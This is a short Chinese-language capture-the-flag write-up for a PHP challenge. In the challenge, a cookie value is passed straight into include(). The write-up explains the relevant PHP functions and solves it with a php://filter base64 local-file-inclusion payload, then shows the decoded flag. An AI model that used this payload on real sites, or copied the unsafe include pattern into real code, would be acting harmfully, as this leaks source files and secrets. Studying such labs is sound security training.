题目
解题
原题代码
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
<b>Notice</b>: Undefined index: language in <b>/var/www/html/index.php</b> on line <b>9</b>
Please choose the language you want : English or Chinese
<h1>Hi,EveryOne,The flag is in flag.php</h1><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
<?php
if( !ini_get('display_errors') ) {
ini_set('display_errors', 'On');
}
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{
@setcookie("language","english");
@include("english.php");
}
else
{
@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?>
</html></html>
其中有php代码,先了解几个函数
ini_get和ini_set函数
ini_set和error_reporting函数
当需要在页面单独打开错误信息可以用下面的2个方法
ini_set('display_errors', 'on');
error_reporting(E_ALL);
注意ini_set(‘display_errors’, ‘on’);的权重大于error_reporting(E_ALL);
也就是说如果display_errors设置为OFF,后者设置为E_ALL也没用
setcookie函数
include关键字
举例子理解:
vars.php文件代码:
<?php
$color = 'green';
$fruit = 'apple';
?>
test.php文件代码
<?php
echo "A $color $fruit";
include 'vars.php';
echo "A $color $fruit";
?>
test.php的打印结果
A
A green apple
file_get_contents函数
传参
language=php://filter/read=convert.base64-encode/resource=flag
获得返回base64编码后网页源码
PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezQ4YmM5MWM0YjFkYmMxZmM5MDk5Y2RlZjAyMjI2MTc1fSI7DQo/Pg==
解码
cyberpeace{48bc91c4b1dbc1fc9099cdef02226175}
提交flag
